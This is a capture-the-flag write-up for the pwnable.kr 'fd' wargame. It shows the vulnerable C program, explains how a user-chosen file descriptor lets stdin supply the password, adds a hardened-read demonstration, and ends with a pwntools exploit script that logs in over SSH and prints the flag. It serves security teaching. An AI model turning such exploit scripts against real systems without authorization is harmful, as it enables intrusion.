Try to play the wargame yourself, but if you are an ABSOLUTE beginner, follow this tutorial: https://youtu.be/971eZhMHQQw
ssh fd@pwnable.kr -p2222 (pw:guest)
Code Review
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* read(); missing from the challenge source, added so it compiles cleanly */

char buf[32];

int main(int argc, char* argv[], char* envp[]){
    if(argc<2){
        printf("pass argv[1] a number\n");
        return 0;
    }
    /* the file descriptor is derived directly from the user-supplied number */
    int fd = atoi( argv[1] ) - 0x1234;
    int len = 0;
    len = read(fd, buf, 32);
    /* note the trailing newline in the expected string */
    if(!strcmp("LETMEWIN\n", buf)){
        printf("good job :)\n");
        system("/bin/cat flag");
        exit(0);
    }
    printf("learn about Linux file IO\n");
    return 0;
}
Take a look at this portion of the code:
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
From man7.org:
Solution
In Linux, the default file descriptors are:
stdin (standard input) => 0
stdout (standard output) => 1
stderr (standard error) => 2
We control the value of fd through argv[1]. The value we want is fd = 0, which is stdin: read() then waits on standard input, and whatever we type is stored in buf. The idea is clear:
Set argv[1] to 4660 (0x1234 in decimal, since atoi() parses decimal) so that fd = 0.
Send "LETMEWIN" followed by a newline through stdin, because the string being compared is "LETMEWIN\n".
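An added example (not the challenge's source or the post's exploit) that models the same descriptor arithmetic and comparison in C: a pipe we control stands in for stdin, and a hardened read rejects descriptors the program never opened and NUL-terminates the buffer. Function names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

/* Same arithmetic as the challenge: atoi() parses decimal, so "4660" gives 0
 * (stdin) while the literal "0x1234" parses as 0 and gives -0x1234. */
int parse_fd(const char *arg) {
    return atoi(arg) - 0x1234;
}

/* Hardened read: reject descriptors that are negative or not open, and always
 * NUL-terminate so a later strcmp() cannot run past the buffer.
 * Returns bytes read, or -1 on error. */
ssize_t checked_read(int fd, char *buf, size_t len) {
    if (fd < 0 || fcntl(fd, F_GETFD) == -1)   /* EBADF for unopened fds */
        return -1;
    ssize_t n = read(fd, buf, len - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Reproduce the challenge check against a descriptor we control: a pipe
 * carrying constructed input in place of stdin.
 * Returns 1 if the "LETMEWIN\n" comparison passes, 0 if not, -1 on error. */
int check_via_pipe(const char *input) {
    int p[2];
    char buf[32] = {0};
    if (pipe(p) != 0)
        return -1;
    if (write(p[1], input, strlen(input)) < 0)
        return -1;
    close(p[1]);                               /* reader sees EOF after the data */
    ssize_t n = checked_read(p[0], buf, sizeof buf);
    close(p[0]);
    if (n < 0)
        return -1;
    return strcmp("LETMEWIN\n", buf) == 0;
}

int main(void) {
    printf("argv[1]=\"4660\"   -> fd %d\n", parse_fd("4660"));
    printf("argv[1]=\"0x1234\" -> fd %d\n", parse_fd("0x1234"));
    printf("pipe carrying \"LETMEWIN\\n\" -> %d\n", check_via_pipe("LETMEWIN\n"));
    printf("pipe carrying \"LETMEWIN\"   -> %d\n", check_via_pipe("LETMEWIN"));
    printf("bogus fd -4660 -> %zd\n", checked_read(-4660, (char[32]){0}, 32));
    return 0;
}
```

The second pipe case shows why the exploit must send a newline: without it the comparison against "LETMEWIN\n" fails.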
Exploit
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host pwnable.kr --port 2222 --user fd --password guest --path /home/fd/fd
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('fd')

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or 'pwnable.kr'
port = int(args.PORT or 2222)
user = args.USER or 'fd'
password = args.PASSWORD or 'guest'
remote_path = '/home/fd/fd'

# Connect to the remote SSH server
shell = None
if not args.LOCAL:
    shell = ssh(user, host, port, password)
    shell.set_working_directory(symlink=True)

def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
    '''Execute the target binary on the remote host'''
    if args.GDB:
        return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw)
    else:
        return shell.process([remote_path] + argv, *a, **kw)

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

argv = [str(0x1234)]          # "4660": atoi() gives 0x1234, so fd = 0 (stdin)
io = start(argv)
io.sendline(b'LETMEWIN')      # sendline appends the "\n" that strcmp expects
success(io.readall().decode())